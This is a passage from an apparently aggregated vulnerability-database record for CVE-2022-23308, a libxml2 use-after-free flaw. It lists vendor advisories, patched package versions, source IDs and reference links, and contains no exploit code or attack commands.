https://access.redhat.com/security/cve/CVE-2022-23219\nhttps://access.redhat.com/security/cve/CVE-2022-23308\nhttps://access.redhat.com/security/cve/CVE-2022-23806\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. ==========================================================================\nUbuntu Security Notice USN-5324-1\nMarch 14, 2022\n\nlibxml2 vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nlibxml2 could be made to crash or run programs if it opened a specially\ncrafted file. An\nattacker could use this issue to cause libxml2 to crash, resulting in a\ndenial of service, or possibly execute arbitrary code. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.10:\n libxml2 2.9.12+dfsg-4ubuntu0.1\n libxml2-utils 2.9.12+dfsg-4ubuntu0.1\n\nUbuntu 20.04 LTS:\n libxml2 2.9.10+dfsg-5ubuntu0.20.04.2\n libxml2-utils 2.9.10+dfsg-5ubuntu0.20.04.2\n\nUbuntu 18.04 LTS:\n libxml2 2.9.4+dfsg1-6.1ubuntu1.5\n libxml2-utils 2.9.4+dfsg1-6.1ubuntu1.5\n\nIn general, a standard system update will make all the necessary changes",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-23308"
},
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "PACKETSTORM",
"id": "168719"
},
{
"db": "PACKETSTORM",
"id": "167185"
},
{
"db": "PACKETSTORM",
"id": "166327"
},
{
"db": "PACKETSTORM",
"id": "166437"
},
{
"db": "PACKETSTORM",
"id": "166805"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "166304"
}
],
"trust": 1.71
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-412332",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-23308",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "166437",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "168719",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166304",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "166327",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "167008",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167194",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.2569",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1263",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1677",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0927",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1051",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2411",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4099",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1073",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5782",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3672",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166803",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051708",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031503",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051713",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042138",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072710",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072053",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032843",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072640",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022041523",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051839",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051326",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022030110",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031620",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031525",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032445",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022053128",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "167185",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "166431",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166433",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167188",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167189",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167184",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167193",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167186",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-412332",
"trust": 0.1
},
{
"db": "ICS CERT",
"id": "ICSA-23-348-10",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-23308",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166805",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166489",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "PACKETSTORM",
"id": "168719"
},
{
"db": "PACKETSTORM",
"id": "167185"
},
{
"db": "PACKETSTORM",
"id": "166327"
},
{
"db": "PACKETSTORM",
"id": "166437"
},
{
"db": "PACKETSTORM",
"id": "166805"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "166304"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"id": "VAR-202202-0906",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:00:24.071000Z",
"patch": {
"_id": null,
"data": [
{
"title": "libxml2 Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=184325"
},
{
"title": "Debian CVElist Bug Report Logs: libxml2: CVE-2022-23308: Use-after-free of ID and IDREF attributes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=9ebc8e6cd9474a4b501cffe479738815"
},
{
"title": "Ubuntu Security Notice: USN-5422-1: libxml2 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5422-1"
},
{
"title": "Red Hat: Moderate: libxml2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220899 - Security Advisory"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1826",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1826"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-23308"
},
{
"title": "Google Chrome: Long Term Support Channel Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=chrome_releases\u0026qid=d941b22c6938f31887f0b0d1ec5e74d8"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP11 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221390 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP11 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221389 - Security Advisory"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-198",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-198"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-068",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-068"
},
{
"title": "Google Chrome: Long Term Support Channel Update for ChromeOS",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=chrome_releases\u0026qid=e0755e202be7c03d6f4e14fbc744c5b2"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221039 - Security Advisory"
},
{
"title": "Amazon Linux AMI: ALAS-2023-1743",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2023-1743"
},
{
"title": "Apple: watchOS 8.6",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=6bd411659b23f6a36cfd1c59cf69e092"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221041 - Security Advisory"
},
{
"title": "Red Hat: Low: Release of OpenShift Serverless Version 1.22.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221747 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221042 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221734 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.8 security and container updates",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221083 - Security Advisory"
},
{
"title": "Apple: iOS 15.5 and iPadOS 15.5",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=f66f27c9aed3f1df2b9271d627617604"
},
{
"title": "Red Hat: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221081 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.3 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221476 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.5.4 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221396 - Security Advisory"
},
{
"title": "Apple: macOS Monterey 12.4",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=73857ee26a600b1527481f1deacc0619"
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/AlphabugX/CVE-2022-23305 "
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/AlphabugX/CVE-2022-RCE "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-416",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://security.gentoo.org/glsa/202210-03"
},
{
"trust": 1.8,
"url": "https://github.com/gnome/libxml2/commit/652dd12a858989b14eed4e84e453059cd3ba340e"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20220331-0008/"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213253"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213254"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213255"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213256"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213257"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213258"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/34"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/38"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/35"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/33"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/36"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/37"
},
{
"trust": 1.8,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/blob/v2.9.13/news"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00004.html"
},
{
"trust": 1.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23308"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/la3mwwayzadwj5f6joubx65uzamqb7rf/"
},
{
"trust": 1.0,
"url": "https://access.redhat.com/security/cve/cve-2022-23308"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/la3mwwayzadwj5f6joubx65uzamqb7rf/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051713"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2569"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072710"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051839"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1051"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1073"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072053"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4099"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5782"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166803/red-hat-security-advisory-2022-1390-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/libxml2-five-vulnerabilities-37614"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032843"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166304/ubuntu-security-notice-usn-5324-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022053128"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167194/apple-security-advisory-2022-05-16-6.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2411"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032445"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051326"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-23308/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1263"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072640"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051708"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042138"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022041523"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168719/gentoo-linux-security-advisory-202210-03.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022030110"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0927"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213254"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3672"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031503"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031525"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167008/red-hat-security-advisory-2022-1747-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166327/red-hat-security-advisory-2022-0899-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166437/red-hat-security-advisory-2022-1039-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031620"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1677"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23219"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23218"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3999"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/416.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1006489"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5422-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-348-10"
},
{
"trust": 0.1,
"url": "https://alas.aws.amazon.com/al2/alas-2022-1826.html"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26738"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26740"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22677"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26731"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26744"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26702"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213258."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26736"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26737"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4142"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://www.apple.com/itunes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26706"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26739"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26711"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0899"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22825"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1025"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25315"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22823"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22822"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23852"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22823"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22826"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22824"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45960"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24731"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22822"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46143"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3999"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25236"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24730"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25315"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-46143"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22825"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24731"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25235"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-45960"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24730"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22826"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1025"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25236"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1389"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3537"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3516"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3517"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3537"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3517"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1081"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.1,
